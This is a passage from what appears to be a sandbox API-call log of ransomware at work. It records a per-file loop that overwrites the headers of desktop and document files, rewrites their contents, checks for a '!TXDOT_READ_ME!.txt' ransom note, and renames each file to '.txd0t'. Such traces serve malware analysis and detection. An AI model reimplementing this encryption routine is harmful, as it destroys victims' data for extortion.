"c:\\users\\fd1hvy\\desktop\\oiyek1tbor7x9s.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0072.810] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=89733) returned 1 [0072.810] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.810] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.810] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffe9f7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.810] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x15e80, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x15e80, lpOverlapped=0x0) returned 1 [0072.812] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffea180, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.812] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x15e80, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x15e80, lpOverlapped=0x0) returned 1 [0072.812] FlushFileBuffers (hFile=0x464) returned 1 [0072.815] GetProcessHeap () returned 0xe30000 [0072.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0072.816] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp" [0072.816] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp") returned="oIyEk1tbor7X9s.bmp" [0072.816] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.816] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.816] GetProcessHeap () returned 0xe30000 [0072.816] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.816] CloseHandle (hObject=0x464) returned 1 [0072.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\oiyek1tbor7x9s.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\oiyek1tbor7x9s.bmp.txd0t")) returned 1 [0072.819] SetEvent (hEvent=0x404) returned 1 [0072.819] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.820] StrCpyW (in: psz1=0x414f6c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi" [0072.820] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t" [0072.820] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t") returned 0 [0072.820] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi", dwFileAttributes=0x80) returned 1 [0072.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\oo_s81.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0072.820] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=44277) returned 1 [0072.820] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.820] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.821] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff510b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.821] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0xacf0, lpNumberOfBytesRead=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f680*=0xacf0, lpOverlapped=0x0) returned 1 [0072.822] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff5310, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.822] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0xacf0, lpNumberOfBytesWritten=0x414f684, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f684*=0xacf0, lpOverlapped=0x0) returned 1 [0072.822] FlushFileBuffers (hFile=0x464) returned 1 [0072.824] GetProcessHeap () returned 0xe30000 [0072.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf4) returned 0xe9d750 [0072.824] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi" [0072.824] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi") returned="OO_s81.avi" [0072.824] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.824] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.824] GetProcessHeap () returned 0xe30000 [0072.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.824] CloseHandle (hObject=0x464) returned 1 [0072.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\oo_s81.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\oo_s81.avi.txd0t")) returned 1 [0072.826] SetEvent (hEvent=0x404) returned 1 [0072.826] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.828] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg" [0072.828] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t" [0072.828] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t") returned 0 [0072.828] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg", dwFileAttributes=0x80) returned 1 [0072.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\pyzrjzkfyy0wh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0072.828] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=59530) returned 1 [0072.828] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.828] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.829] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff1576, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.829] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0xe880, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0xe880, lpOverlapped=0x0) returned 1 [0072.830] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff1780, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.830] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0xe880, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0xe880, lpOverlapped=0x0) returned 1 [0072.830] FlushFileBuffers (hFile=0x464) returned 1 [0072.833] GetProcessHeap () returned 0xe30000 [0072.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0072.833] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg" [0072.833] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg") returned="PYzrJzKfYy0WH.jpg" [0072.833] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.833] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.833] GetProcessHeap () returned 0xe30000 [0072.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.833] CloseHandle (hObject=0x464) returned 1 [0072.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\pyzrjzkfyy0wh.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\pyzrjzkfyy0wh.jpg.txd0t")) returned 1 [0072.836] SetEvent (hEvent=0x404) returned 1 [0072.836] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.992] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp" [0072.992] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t" [0072.992] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t") returned 0 [0072.992] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp", dwFileAttributes=0x80) returned 1 [0072.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\rbwrlfnmcy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0072.993] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=1443) returned 1 [0072.993] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.993] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.994] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffff85d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.994] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x5a0, lpOverlapped=0x0) returned 1 [0072.994] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffffa60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.995] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x5a0, lpOverlapped=0x0) returned 1 [0072.995] FlushFileBuffers (hFile=0x464) returned 1 [0073.103] GetProcessHeap () returned 0xe30000 [0073.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecfcd8 [0073.103] StrCpyW (in: psz1=0xecfcd8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp" [0073.103] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp") returned="rBWrlFNmCY.bmp" [0073.103] StrCpyW (in: psz1=0xecfd10, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.103] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.103] GetProcessHeap () returned 0xe30000 [0073.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfcd8 | out: hHeap=0xe30000) returned 1 [0073.103] CloseHandle (hObject=0x464) returned 1 [0073.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\rbwrlfnmcy.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\rbwrlfnmcy.bmp.txd0t")) returned 1 [0073.128] SetEvent (hEvent=0x404) returned 1 [0073.128] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0073.129] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif" [0073.129] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t" [0073.129] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t") returned 0 [0073.129] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif", dwFileAttributes=0x80) returned 1 [0073.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\s2-ewynmbk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0073.130] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=67478) returned 1 [0073.130] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.130] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0073.130] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef66a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.131] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x10790, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x10790, lpOverlapped=0x0) returned 1 [0073.132] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef870, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.132] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x10790, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x10790, lpOverlapped=0x0) returned 1 [0073.132] FlushFileBuffers (hFile=0x464) returned 1 [0073.987] GetProcessHeap () returned 0xe30000 [0073.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecf078 [0073.988] StrCpyW (in: psz1=0xecf078, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif" [0073.988] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif") returned="s2-ewyNmBK.gif" [0073.988] StrCpyW (in: psz1=0xecf0b0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.988] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.988] GetProcessHeap () returned 0xe30000 [0073.988] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf078 | out: hHeap=0xe30000) returned 1 [0073.988] CloseHandle (hObject=0x464) returned 1 [0073.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\s2-ewynmbk.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\s2-ewynmbk.gif.txd0t")) returned 1 [0073.999] SetEvent (hEvent=0x404) returned 1 [0073.999] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0074.003] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx" [0074.003] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t" [0074.003] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t") returned 0 [0074.003] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx", dwFileAttributes=0x80) returned 1 [0074.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\82f_2pily3rkg8cydxkr.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0074.009] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=23061) returned 1 [0074.009] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.009] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0074.012] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffa3eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.013] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x5a10, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x5a10, lpOverlapped=0x0) returned 1 [0074.013] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffa5f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.013] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x5a10, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x5a10, lpOverlapped=0x0) returned 1 [0074.017] FlushFileBuffers (hFile=0x46c) returned 1 [0074.021] GetProcessHeap () returned 0xe30000 [0074.022] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1ec0 [0074.022] StrCpyW (in: psz1=0xed1ec0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx" [0074.022] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx") returned="82f_2PILY3Rkg8CydxKr.xlsx" [0074.022] StrCpyW (in: psz1=0xed1efc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.022] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.022] GetProcessHeap () returned 0xe30000 [0074.022] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1ec0 | out: hHeap=0xe30000) returned 1 [0074.022] CloseHandle (hObject=0x46c) returned 1 [0074.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\82f_2pily3rkg8cydxkr.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\82f_2pily3rkg8cydxkr.xlsx.txd0t")) returned 1 [0074.027] SetEvent (hEvent=0x404) returned 1 [0074.027] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0074.035] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp" [0074.035] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t" [0074.035] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t") returned 0 [0074.036] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp", dwFileAttributes=0x80) returned 1 [0074.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp" (normalized: "c:\\users\\fd1hvy\\documents\\chs1ef v8z.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0074.036] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=99423) returned 1 [0074.036] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.036] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, 